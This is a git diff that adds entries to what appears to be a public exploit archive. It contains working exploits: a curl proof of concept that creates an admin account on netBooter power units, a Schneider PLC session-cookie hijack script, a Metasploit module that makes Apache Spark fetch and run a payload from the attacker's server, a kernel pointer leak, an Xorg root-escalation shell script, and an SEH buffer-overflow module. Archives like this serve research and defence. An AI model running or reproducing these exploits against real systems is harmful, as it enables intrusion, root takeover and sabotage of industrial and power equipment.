diff --git a/exploits/cgi/webapps/45920.txt b/exploits/cgi/webapps/45920.txt new file mode 100644 index 000000000..d1b71c48d --- /dev/null +++ b/exploits/cgi/webapps/45920.txt @@ -0,0 +1,49 @@ +Synaccess netBooter NP-02x/NP-08x 6.8 Authentication Bypass + + +Vendor: Synaccess Networks Inc. +Product web page: https://www.synaccess-net.com +Affected version: NP-0201D (ver 6.8C) + NP-02 (ver 6.5C) + NP-02 (ver 6.4BC) + NP-0801D (ver 6.4A) + NP-08 (ver 6.10) + NP-02 (ver 5.53BC) + +Summary: netBooter NP-02B and NP-02BH provide independent +control of one or two outlets in a small, robust form factor. +Manageable via TCP/IP network or direct serial connection +and 1U brackets (optional) for mounting. Control power to +your devices with the ability to fit just about anywhere. + +netBooter NP-0801DU and NP-0801DUH PDUs provide secured +remote power source management of 8 independent outlets. +Includes true RMS AC current reading and environment +temperature monitoring* via TCP/IP networks or local direct +connection. + +Desc: netBooter suffers from an authentication bypass +vulnerability due to missing control check when calling +webNewAcct.cgi script while creating users. This allows an +unauthenticated attacker to create admin user account and +bypass authentication giving her the power to turn off a +power supply to a resource. + +Tested on: Synaccess server + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2018-5500 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5500.php + + +05.11.2018 + +-- + +PoC: + +curl -i http://10.0.0.17/webNewAcct.cgi --data "A1=hackerplusplus&A2=1234&A2=1234" \ No newline at end of file diff --git a/exploits/hardware/webapps/45918.py b/exploits/hardware/webapps/45918.py new file mode 100755 index 000000000..7e8379120 --- /dev/null +++ b/exploits/hardware/webapps/45918.py @@ -0,0 +1,118 @@ +#! /usr/bin/env python +''' + Copyright 2018 Photubias(c) + # Exploit Title: Schneider Session Calculation - CVE-2017-6026 + # Date: 2018-09-30 + # Exploit Author: Deneut Tijl + # Vendor Homepage: www.schneider-electric.com + # Software Link: https://www.schneider-electric.com/en/download/document/M241-M251+Firmware+v4.0.3.20/ + # Version: Schneider Electric PLC 4.0.2.11 & Boot v0.0.2.11 + # CVE : CVE-2017-6026 + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + + File name CVE-2017-6026-SchneiderSessionCalculation.py + written by tijl[dot]deneut[at]howest[dot]be + + Tested on the Schneider TM241 PLC with Firmware 4.0.2.11 & Boot 0.0.2.11. + Firmware: https://www.schneider-electric.com/en/download/document/M241-M251+Firmware+v4.0.3.20/ + Security Note: https://www.schneider-electric.com/en/download/document/SEVD-2017-075-02/ + + This script will calculate the website session cookie, which is static after every reboot. + (This cookie is actually the Epoch time at PLC startup) + The only prerequisite is that, since the reboot, a user must have been logged in. + E.g. Administrator (with default password 'admin') + or USER (with default password 'USER') + + After retrieving the cookie, various website actions are possible (including a DoS). + Sample output: + C:\Users\admin\Desktop>SchneiderGetSession.py + Please enter an IP [10.10.36.224]: + This device has booted 33 times + Cookie: 1521612584 (22/03/2018 06:09:44.014) + ---------------- + --- Device: TM241CE40R + --- MAC Address: 0080F40B24E0 + --- Firmware: 4.0.2.11 + --- Controller: Running + ---------------- + Press Enter to close +''' +import urllib2 + +strIP = raw_input('Please enter an IP [10.10.36.224]: ') +if strIP == '': strIP = '10.10.36.224' +FwLogURL = 'http://' + strIP + '/usr/Syslog/FwLog.txt' +try: + FwLogResp = urllib2.urlopen(urllib2.Request(FwLogURL)).readlines() + NumberOfPowerOns = 0 + for line in FwLogResp: + if 'Firmware core2' in line: + NumberOfPowerOns += 1 + CookieVal = line.split(' ')[1] + BootupTime = line.split('(')[1].split(')')[0] + NumberOfPowerOns /= 2 +except: + print('Error: URL not found.') + raw_input('Press enter to exit') + exit() + +try: + CookieVal +except: + print('Error: ' + FwLogURL + ' does not contain the necessary data.') + raw_input('Press Enter to Exit') + exit() + +print('This device has booted ' + str(NumberOfPowerOns) + ' times') +print('Cookie: ' + CookieVal + ' (' + BootupTime + ')') +print('----------------') +raw_input('Press enter to see if the cookie is set on the webserver.'+"\n") + +CtrlURL = 'http://' + strIP + '/plcExchange/getValues/' +CtrlPost = 'S;100;0;136;s;s;S;2;0;24;w;d;S;1;0;8;B;d;S;1;0;9;B;d;S;1;0;10;B;d;S;1;0;11;B;d;' + +try: + CtrlUser = 'Administrator' + DataReq = urllib2.Request(CtrlURL, CtrlPost, headers={'Cookie':'M258_LOG=' + CtrlUser + ':' + CookieVal}) + DataResp = urllib2.urlopen(DataReq).read() +except: + print('Failure for user \'Administrator\'') + try: + CtrlUser = 'USER' + DataReq = urllib2.Request(CtrlURL, CtrlPost, headers={'Cookie':'M258_LOG=' + CtrlUser + ':' + CookieVal}) + DataResp = urllib2.urlopen(DataReq).read() + except: + print('Failure for user \'USER\'') + raw_input('Press enter to exit') +print('### SUCCESS (' + CtrlUser + ') ###') +print('--- Device: ' + DataResp.split(' ')[0]) +print('--- MAC Address: ' + DataResp.split(';')[0].split(' ')[1][1:]) +print('--- Firmware: ' + DataResp.split(';')[2] + '.' + DataResp.split(';')[3] + '.' +DataResp.split(';')[4] + '.' +DataResp.split(';')[5]) +state = DataResp.split(';')[1] +if state == '2': + print('--- Controller: Running') +elif state == '1': + print('--- Controller: Stopped') +elif state == '0': + print('--- Controller: ERROR mode') +print('') +print('--- To exploit: Create cookie for domain "'+strIP+'"') +print(' with name "M258_LOG" and value "'+CtrlUser+':'+CookieVal+'"') +print(' and open "http://'+strIP+'/index2.htm"') +print('') +print('----------------') + +raw_input('Press enter to close') +exit() \ No newline at end of file diff --git a/exploits/java/remote/45925.rb b/exploits/java/remote/45925.rb new file mode 100755 index 000000000..2bcb635f6 --- /dev/null +++ b/exploits/java/remote/45925.rb @@ -0,0 +1,150 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Apache Spark Unauthenticated Command Execution', + 'Description' => %q{ + This module exploits an unauthenticated command execution vulnerability in Apache Spark with standalone cluster mode through REST API. + It uses the function CreateSubmissionRequest to submit a malious java class and trigger it. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'aRe00t', # Proof of concept + 'Green-m ' # Metasploit module + ], + 'References' => + [ + ['URL', 'https://www.jianshu.com/p/a080cb323832'], + ['URL', 'https://github.com/vulhub/vulhub/tree/master/spark/unacc'] + ], + 'Platform' => 'java', + 'Arch' => [ARCH_JAVA], + 'Targets' => + [ + ['Automatic', {}] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Dec 12 2017', + 'DefaultTarget' => 0, + 'Notes' => + { + 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS], + 'Stability' => [ CRASH_SAFE ], + 'Reliability' => [ REPEATABLE_SESSION] + } + )) + + register_options [ + Opt::RPORT(6066), + OptInt.new('HTTPDELAY', [true, 'Number of seconds the web server will wait before termination', 10]) + ] + + end + + def check + return CheckCode::Detected if get_version + CheckCode::Unknown + end + + def primer + path = service.resources.keys[0] + binding_ip = srvhost_addr + + proto = datastore['SSL'] ? 'https' : 'http' + payload_uri = "#{proto}://#{binding_ip}:#{datastore['SRVPORT']}/#{path}" + + send_payload(payload_uri) + end + + def exploit + fail_with(Failure::Unknown, "Something went horribly wrong and we couldn't continue to exploit.") unless get_version + + vprint_status("Generating payload ...") + @pl = generate_payload.encoded_jar(random:true) + print_error("Failed to generate the payload.") unless @pl + + print_status("Starting up our web service ...") + Timeout.timeout(datastore['HTTPDELAY']) { super } + rescue Timeout::Error + end + + def get_version + @version = nil + + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path), + 'method' => 'GET' + ) + + unless res + vprint_bad("#{peer} - No response. ") + return false + end + + if res.code == 401 + print_bad("#{peer} - Authentication required.") + return false + end + + unless res.code == 400 + return false + end + + res_json = res.get_json_document + @version = res_json['serverSparkVersion'] + + if @version.nil? + vprint_bad("#{peer} - Cannot parse the response, seems like it's not Spark REST API.") + return false + end + + true + end + + def send_payload(payload_uri) + rand_appname = Rex::Text.rand_text_alpha_lower(8..16) + + data = + { + "action" => "CreateSubmissionRequest", + "clientSparkVersion" => @version.to_s, + "appArgs" => [], + "appResource" => payload_uri.to_s, + "environmentVariables" => {"SPARK_ENV_LOADED" => "1"}, + "mainClass" => "#{@pl.substitutions["metasploit"]}.Payload", + "sparkProperties" => + { + "spark.jars" => payload_uri.to_s, + "spark.driver.supervise" => "false", + "spark.app.name" => rand_appname.to_s, + "spark.eventLog.enabled" => "true", + "spark.submit.deployMode" => "cluster", + "spark.master" => "spark://#{rhost}:#{rport}" + } + } + + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, "/v1/submissions/create"), + 'method' => 'POST', + 'ctype' => 'application/json;charset=UTF-8', + 'data' => data.to_json + ) + + end + + # Handle incoming requests + def on_request_uri(cli, request) + print_status("#{rhost}:#{rport} - Sending the payload to the server...") + send_response(cli, @pl) + end +end \ No newline at end of file diff --git a/exploits/linux/dos/45919.c b/exploits/linux/dos/45919.c new file mode 100644 index 000000000..0933b6853 --- /dev/null +++ b/exploits/linux/dos/45919.c @@ -0,0 +1,404 @@ +# Exploit Title: Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp kernel pointer +# Google Dork: - +# Date: 2018-11-20 +# Exploit Author: Jinbum Park +# Vendor Homepage: - +# Software Link: - +# Version: Linux Kernel 4.8 (Ubuntu 16.04) +# Tested on: 4.8.0-36-generic #36~16.04.1-Ubuntu SMP Sun Feb 5 09:39:57 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux +# CVE: 2017-7558 +# Category: Local + +/* + * [ Briefs ] + * - CVE-2017-7558 has discovered and reported by Stefano Brivio of the Red Hat. (but, no publicly available exploit) + * - This is local exploit against the CVE-2017-7558. + * + * [ Tested version ] + * - 4.8.0-36-generic #36~16.04.1-Ubuntu SMP Sun Feb 5 09:39:57 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux + * + * [ Prerequisites ] + * - sudo apt-get install libsctp-dev + * + * [ Goal ] + * - Leak kernel symbol address of "sctp_af_inet" + * + * [ Run exploit ] + * - $ gcc poc.c -o poc -lsctp -lpthread + * - $ ./poc + * [] Waiting for connection + * [] New client connected + * [] Received data: Hello, Server! + * [] sctp_af_inet address : 0 + * [] sctp_af_inet address : ffffffffc0c541e0 + * [] sctp_af_inet address : 0 + * [] sctp_af_inet address : ffffffffc0c541e0 (leaked kernel pointer) + * - $ sudo cat /proc/kallsyms | grep sctp_af_inet (Check whether leaked pointer value is corret) + * ffffffffc0c541e0 d sctp_af_inet [sctp] + * + * [ Contact ] + * - jinb.park7@gmail.com + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define MY_PORT_NUM 62324 + +struct sctp_info { + __u32 sctpi_tag; + __u32 sctpi_state; + __u32 sctpi_rwnd; + __u16 sctpi_unackdata; + __u16 sctpi_penddata; + __u16 sctpi_instrms; + __u16 sctpi_outstrms; + __u32 sctpi_fragmentation_point; + __u32 sctpi_inqueue; + __u32 sctpi_outqueue; + __u32 sctpi_overall_error; + __u32 sctpi_max_burst; + __u32 sctpi_maxseg; + __u32 sctpi_peer_rwnd; + __u32 sctpi_peer_tag; + __u8 sctpi_peer_capable; + __u8 sctpi_peer_sack; + __u16 __reserved1; + + /* assoc status info */ + __u64 sctpi_isacks; + __u64 sctpi_osacks; + __u64 sctpi_opackets; + __u64 sctpi_ipackets; + __u64 sctpi_rtxchunks; + __u64 sctpi_outofseqtsns; + __u64 sctpi_idupchunks; + __u64 sctpi_gapcnt; + __u64 sctpi_ouodchunks; + __u64 sctpi_iuodchunks; + __u64 sctpi_oodchunks; + __u64 sctpi_iodchunks; + __u64 sctpi_octrlchunks; + __u64 sctpi_ictrlchunks; + + /* primary transport info */ + struct sockaddr_storage sctpi_p_address; + __s32 sctpi_p_state; + __u32 sctpi_p_cwnd; + __u32 sctpi_p_srtt; + __u32 sctpi_p_rto; + __u32 sctpi_p_hbinterval; + __u32 sctpi_p_pathmaxrxt; + __u32 sctpi_p_sackdelay; + __u32 sctpi_p_sackfreq; + __u32 sctpi_p_ssthresh; + __u32 sctpi_p_partial_bytes_acked; + __u32 sctpi_p_flight_size; + __u16 sctpi_p_error; + __u16 __reserved2; + + /* sctp sock info */ + __u32 sctpi_s_autoclose; + __u32 sctpi_s_adaptation_ind; + __u32 sctpi_s_pd_point; + __u8 sctpi_s_nodelay; + __u8 sctpi_s_disable_fragments; + __u8 sctpi_s_v4mapped; + __u8 sctpi_s_frag_interleave; + __u32 sctpi_s_type; + __u32 __reserved3; +}; + +enum { + SS_UNKNOWN, + SS_ESTABLISHED, + SS_SYN_SENT, + SS_SYN_RECV, + SS_FIN_WAIT1, + SS_FIN_WAIT2, + SS_TIME_WAIT, + SS_CLOSE, + SS_CLOSE_WAIT, + SS_LAST_ACK, + SS_LISTEN, + SS_CLOSING, + SS_MAX +}; + +enum sctp_state { + SCTP_STATE_CLOSED = 0, + SCTP_STATE_COOKIE_WAIT = 1, + SCTP_STATE_COOKIE_ECHOED = 2, + SCTP_STATE_ESTABLISHED = 3, + SCTP_STATE_SHUTDOWN_PENDING = 4, + SCTP_STATE_SHUTDOWN_SENT = 5, + SCTP_STATE_SHUTDOWN_RECEIVED = 6, + SCTP_STATE_SHUTDOWN_ACK_SENT = 7, +}; + +enum { + TCP_ESTABLISHED = 1, + TCP_SYN_SENT, + TCP_SYN_RECV, + TCP_FIN_WAIT1, + TCP_FIN_WAIT2, + TCP_TIME_WAIT, + TCP_CLOSE, + TCP_CLOSE_WAIT, + TCP_LAST_ACK, + TCP_LISTEN, + TCP_CLOSING, /* Now a valid state */ + TCP_NEW_SYN_RECV, + + TCP_MAX_STATES /* Leave at the end! */ +}; + +enum sctp_sock_state { + SCTP_SS_CLOSED = TCP_CLOSE, + SCTP_SS_LISTENING = TCP_LISTEN, + SCTP_SS_ESTABLISHING = TCP_SYN_SENT, + SCTP_SS_ESTABLISHED = TCP_ESTABLISHED, + SCTP_SS_CLOSING = TCP_CLOSE_WAIT, +}; + +static volatile int servser_stop_flag = 0; +static volatile int client_stop_flag = 0; + +static void *server_thread(void *arg) { + int listen_fd, conn_fd, flags, ret, in; + char buffer[1024]; + struct sctp_sndrcvinfo sndrcvinfo; + struct sockaddr_in servaddr = { + .sin_family = AF_INET, + .sin_addr.s_addr = htonl(INADDR_ANY), + .sin_port = htons(MY_PORT_NUM), + }; + struct sctp_initmsg initmsg = { + .sinit_num_ostreams = 5, + .sinit_max_instreams = 5, + .sinit_max_attempts = 4, + }; + + listen_fd = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP); + if (listen_fd < 0) + return NULL; + + ret = bind(listen_fd, (struct sockaddr *) &servaddr, sizeof(servaddr)); + if (ret < 0) + return NULL; + + ret = setsockopt(listen_fd, IPPROTO_SCTP, SCTP_INITMSG, &initmsg, sizeof(initmsg)); + if (ret < 0) + return NULL; + + ret = listen(listen_fd, initmsg.sinit_max_instreams); + if (ret < 0) + return NULL; + + printf("[] Waiting for connection\n"); + + conn_fd = accept(listen_fd, (struct sockaddr *) NULL, NULL); + if(conn_fd < 0) + return NULL; + + printf("[] New client connected\n"); + + in = sctp_recvmsg(conn_fd, buffer, sizeof(buffer), NULL, 0, &sndrcvinfo, &flags); + if (in > 0) { + printf("[] Received data: %s\n", buffer); + } + + while (servser_stop_flag == 0) + sleep(1); + + close(conn_fd); + return NULL; +} + +static void *client_thread(void *arg) { + int conn_fd, ret; + const char *msg = "Hello, Server!"; + struct sockaddr_in servaddr = { + .sin_family = AF_INET, + .sin_port = htons(MY_PORT_NUM), + .sin_addr.s_addr = inet_addr("127.0.0.1"), + }; + + conn_fd = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP); + if (conn_fd < 0) + return NULL; + + ret = connect(conn_fd, (struct sockaddr *) &servaddr, sizeof(servaddr)); + if (ret < 0) + return NULL; + + ret = sctp_sendmsg(conn_fd, (void *) msg, strlen(msg) + 1, NULL, 0, 0, 0, 0, 0, 0 ); + if (ret < 0) + return NULL; + + while (client_stop_flag == 0) + sleep(1); + + close(conn_fd); + return NULL; +} + +//Copied from libmnl source +#define SOCKET_BUFFER_SIZE (getpagesize() < 8192L ? getpagesize() : 8192L) + +int send_diag_msg(int sockfd){ + struct msghdr msg; + struct nlmsghdr nlh; + struct inet_diag_req_v2 conn_req; + struct sockaddr_nl sa; + struct iovec iov[4]; + int retval = 0; + + //For the filter + struct rtattr rta; + void *filter_mem = NULL; + int filter_len = 0; + + memset(&msg, 0, sizeof(msg)); + memset(&sa, 0, sizeof(sa)); + memset(&nlh, 0, sizeof(nlh)); + memset(&conn_req, 0, sizeof(conn_req)); + + sa.nl_family = AF_NETLINK; + + conn_req.sdiag_family = AF_INET; + conn_req.sdiag_protocol = IPPROTO_SCTP; + conn_req.idiag_states = SCTP_SS_CLOSED; + conn_req.idiag_ext |= (1 << (INET_DIAG_INFO - 1)); + + nlh.nlmsg_len = NLMSG_LENGTH(sizeof(conn_req)); + nlh.nlmsg_flags = NLM_F_DUMP | NLM_F_REQUEST; + + nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY; + iov[0].iov_base = (void*) &nlh; + iov[0].iov_len = sizeof(nlh); + iov[1].iov_base = (void*) &conn_req; + iov[1].iov_len = sizeof(conn_req); + + //Set essage correctly + msg.msg_name = (void*) &sa; + msg.msg_namelen = sizeof(sa); + msg.msg_iov = iov; + if(filter_mem == NULL) + msg.msg_iovlen = 2; + else + msg.msg_iovlen = 4; + + retval = sendmsg(sockfd, &msg, 0); + + if(filter_mem != NULL) + free(filter_mem); + + return retval; +} + +void parse_diag_msg(struct inet_diag_msg *diag_msg, int rtalen){ + struct rtattr *attr; + struct sctp_info *sctpi; + int i; + unsigned char *ptr; + + if(diag_msg->idiag_family != AF_INET && diag_msg->idiag_family != AF_INET6) { + fprintf(stderr, "Unknown family\n"); + return; + } + + if(rtalen > 0){ + attr = (struct rtattr*) (diag_msg+1); + + while(RTA_OK(attr, rtalen)){ + if(attr->rta_type == INET_DIAG_INFO){ + // leak kernel pointer here!! + sctpi = (struct sctp_info*) RTA_DATA(attr); + ptr = ((unsigned char *)&sctpi->sctpi_p_address + 32); + printf("[] sctp_af_inet address : %lx\n", *(unsigned long *)ptr); + } + attr = RTA_NEXT(attr, rtalen); + } + } +} + +int main(int argc, char *argv[]){ + int nl_sock = 0, numbytes = 0, rtalen = 0; + struct nlmsghdr *nlh; + uint8_t recv_buf[SOCKET_BUFFER_SIZE]; + struct inet_diag_msg *diag_msg; + pthread_t sctp_server; + pthread_t sctp_client; + + // run sctp server & client + if (pthread_create(&sctp_server, NULL, server_thread, NULL)) + return EXIT_FAILURE; + sleep(2); + + if (pthread_create(&sctp_client, NULL, client_thread, NULL)) + return EXIT_FAILURE; + sleep(2); + + // run inet_diag + if((nl_sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_INET_DIAG)) == -1){ + perror("socket: "); + return EXIT_FAILURE; + } + + if(send_diag_msg(nl_sock) < 0){ + perror("sendmsg: "); + return EXIT_FAILURE; + } + + while(1){ + numbytes = recv(nl_sock, recv_buf, sizeof(recv_buf), 0); + nlh = (struct nlmsghdr*) recv_buf; + + while(NLMSG_OK(nlh, numbytes)){ + if(nlh->nlmsg_type == NLMSG_DONE) { + return EXIT_SUCCESS; + } + + if(nlh->nlmsg_type == NLMSG_ERROR){ + fprintf(stderr, "Error in netlink message\n"); + return EXIT_FAILURE; + } + + diag_msg = (struct inet_diag_msg*) NLMSG_DATA(nlh); + rtalen = nlh->nlmsg_len - NLMSG_LENGTH(sizeof(*diag_msg)); + parse_diag_msg(diag_msg, rtalen); + + nlh = NLMSG_NEXT(nlh, numbytes); + } + } + printf("loop next\n"); + + // exit threads + client_stop_flag = 1; + if (pthread_join(sctp_client, NULL)) + return EXIT_FAILURE; + + servser_stop_flag = 1; + if (pthread_join(sctp_server, NULL)) + return EXIT_FAILURE; + + printf("end\n"); + return EXIT_SUCCESS; +} \ No newline at end of file diff --git a/exploits/openbsd/local/45922.sh b/exploits/openbsd/local/45922.sh new file mode 100755 index 000000000..02b225524 --- /dev/null +++ b/exploits/openbsd/local/45922.sh @@ -0,0 +1,70 @@ +#!/bin/sh + +# +# raptor_xorgy - xorg-x11-server LPE via modulepath switch +# Copyright (c) 2018 Marco Ivaldi +# +# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission +# check for -modulepath and -logfile options when starting Xorg. X server +# allows unprivileged users with the ability to log in to the system via +# physical console to escalate their privileges and run arbitrary code under +# root privileges (CVE-2018-14665). +# +# This exploit variant triggers the bug in the -modulepath command line switch +# to load a malicious X11 module in order to escalate privileges to root on +# vulnerable systems. This technique is less invasive than exploiting the +# -logfile switch, however the gcc compiler must be present in order for it to +# work out of the box. Alternatively, you must use a pre-compiled malicious .so +# compatible with the target system and modify the exploit accordingly. +# +# It works very reliably on Solaris 11.4 and should work on most vulnerable +# Linux distributions (though I haven't tested it). For some reason, it fails to +# obtain uid 0 on OpenBSD... They might have an additional protection in place. +# +# Thanks to @alanc and @nushinde for discussing this alternative vector. +# +# See also: +# https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm +# https://github.com/0xdea/exploits/blob/master/solaris/raptor_solgasm +# https://www.securepatterns.com/2018/10/cve-2018-14665-another-way-of.html +# https://nvd.nist.gov/vuln/detail/CVE-2006-0745 +# +# Usage: +# raptor@stalker:~$ chmod +x raptor_xorgy +# raptor@stalker:~$ ./raptor_xorgy +# [...] +# root@stalker:~# id +# uid=0(root) gid=0(root) +# +# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2): +# Oracle Solaris 11 X86 [tested on 11.4.0.0.1.15.0 with Xorg 1.19.5] +# Oracle Solaris 11 SPARC [untested] +# CentOS Linux 7 [untested, it should work] +# Red Hat Enterprise Linux 7 [untested] +# Ubuntu Linux 18.10 [untested] +# Ubuntu Linux 18.04 LTS [untested] +# Ubuntu Linux 16.04 LTS [untested] +# Debian GNU/Linux 9 [untested] +# [...] +# + +echo "raptor_xorgy - xorg-x11-server LPE via modulepath switch" +echo "Copyright (c) 2018 Marco Ivaldi " +echo + +# prepare the payload +cat << EOF > /tmp/pwned.c +_init() +{ + setuid(0); + setgid(0); + system("/bin/bash"); +} +EOF +# libglx.so should be a good target, refer to Xorg logs for other candidates +gcc -fPIC -shared -nostartfiles -w /tmp/pwned.c -o /tmp/libglx.so +if [ $? -ne 0 ]; then echo; echo "error: cannot compile /tmp/pwned.c"; exit; fi + +# trigger the bug +echo "Got root?" +Xorg -modulepath ",/tmp" :1 \ No newline at end of file diff --git a/exploits/windows/dos/45923.html b/exploits/windows/dos/45923.html new file mode 100644 index 000000000..733dddd6a --- /dev/null +++ b/exploits/windows/dos/45923.html @@ -0,0 +1,146 @@ + + + + + + + \ No newline at end of file diff --git a/exploits/windows/dos/45924.html b/exploits/windows/dos/45924.html new file mode 100644 index 000000000..96135a778 --- /dev/null +++ b/exploits/windows/dos/45924.html @@ -0,0 +1,100 @@ + + + + + + + \ No newline at end of file diff --git a/exploits/windows/local/45921.rb b/exploits/windows/local/45921.rb new file mode 100755 index 000000000..40d63433b --- /dev/null +++ b/exploits/windows/local/45921.rb @@ -0,0 +1,73 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'HTML5 Video Player 1.2.5 - Buffer Overflow (SEH)', + 'Description' => %q{ + This module exploits a stack based buffer overflow in HTML5 Video Player 1.2.5 , when + with the name "msf.txt". 1.file with the name "msf.txt" and copy content to clipboard ,2.Open software, click Help > Register and paste "Username" click "OK". + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'T3jv1l', # Original discovery + 'Kağan Çapar', # Original discovery + 'd3ckx1 d3ck(at)qq.com', # MSF module + ], + 'References' => + [ + [ 'OSVDB', '' ], + [ 'EBD', '45888' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process' + }, + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => "\x00\x0a\x0d\x1a", + 'DisableNops' => true, + 'Space' => 4000 + }, + 'Targets' => + [ + [ 'HTML Video Player 1.2.5', + { + 'Ret' => 0x7C901931, # 0x7C901931 : P/P/R FROM ntdll.dll form winxp sp3 + 'Offset' => 1984 + } + ], + ], + 'Privileged' => false, + 'DisclosureDate' => 'Nov 22 2018', + 'DefaultTarget' => 0)) + + register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.txt']),], self.class) + + end + + def exploit + buf = "\x41"*(target['Offset']) + buf << "\xeb\x06#{Rex::Text.rand_text_alpha(2, payload_badchars)}" # nseh (jmp to payload) + buf << [target.ret] .pack('V') # seh + buf << make_nops(30) + buf << payload.encoded + buf << "\x90" * 300 + + file_create(buf) + handler + + end +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index e4c910aa8..e6a134bfc 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6199,6 +6199,9 @@ id,file,description,date,author,type,platform,port 45910,exploits/multiple/dos/45910.js,"WebKit JSC JIT - 'JSPropertyNameEnumerator' Type Confusion",2018-11-29,"Google Security Research",dos,multiple, 45911,exploits/multiple/dos/45911.js,"WebKit JIT - 'ByteCodeParser::handleIntrinsicCall' Type Confusion",2018-11-29,"Google Security Research",dos,multiple, 45912,exploits/multiple/dos/45912.js,"WebKit JSC - BytecodeGenerator::hoistSloppyModeFunctionIfNecessary Does not Invalidate the 'ForInContext' Object",2018-11-29,"Google Security Research",dos,multiple, +45919,exploits/linux/dos/45919.c,"Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp Kernel Pointer",2018-11-30,"Jinbum Park",dos,linux, +45923,exploits/windows/dos/45923.html,"VBScript - 'OLEAUT32!VariantClear' and 'scrrun!VBADictionary::put_Item' Use-After-Free",2018-11-30,"Google Security Research",dos,windows, +45924,exploits/windows/dos/45924.html,"VBScript - 'rtFilter' Out-of-Bounds Read",2018-11-30,"Google Security Research",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10125,6 +10128,8 @@ id,file,description,date,author,type,platform,port 45913,exploits/linux/local/45913.rb,"Unitrends Enterprise Backup - bpserverd Privilege Escalation (Metasploit)",2018-11-29,Metasploit,local,linux, 45915,exploits/linux/local/45915.rb,"Linux - Nested User Namespace idmap Limit Local Privilege Escalation (Metasploit)",2018-11-29,Metasploit,local,linux, 45916,exploits/macos/local/45916.rb,"Mac OS X - libxpc MITM Privilege Escalation (Metasploit)",2018-11-29,Metasploit,local,macos, +45921,exploits/windows/local/45921.rb,"HTML5 Video Player 1.2.5 - Buffer Overflow (Metasploit)",2018-11-30,d3ckx1,local,windows, +45922,exploits/openbsd/local/45922.sh,"xorg-x11-server < 1.20.3 - 'modulepath' Local Privilege Escalation",2018-11-30,"Marco Ivaldi",local,openbsd, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -16978,6 +16983,7 @@ id,file,description,date,author,type,platform,port 45909,exploits/hardware/remote/45909.rb,"Netgear Devices - Unauthenticated Remote Command Execution (Metasploit)",2018-11-27,Metasploit,remote,hardware,80 45914,exploits/linux/remote/45914.rb,"PHP imap_open - Remote Code Execution (Metasploit)",2018-11-29,Metasploit,remote,linux, 45917,exploits/multiple/remote/45917.rb,"TeamCity Agent - XML-RPC Command Execution (Metasploit)",2018-11-29,Metasploit,remote,multiple, +45925,exploits/java/remote/45925.rb,"Apache Spark - Unauthenticated Command Execution (Metasploit)",2018-11-30,Metasploit,remote,java,6066 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -40418,3 +40424,5 @@ id,file,description,date,author,type,platform,port 45902,exploits/php/webapps/45902.txt,"Ticketly 1.0 - 'kind_id' SQL Injection",2018-11-26,"Javier Olmedo",webapps,php,80 45903,exploits/php/webapps/45903.txt,"No-Cms 1.0 - 'order_by' SQL Injection",2018-11-26,"Loading Kura Kura",webapps,php,80 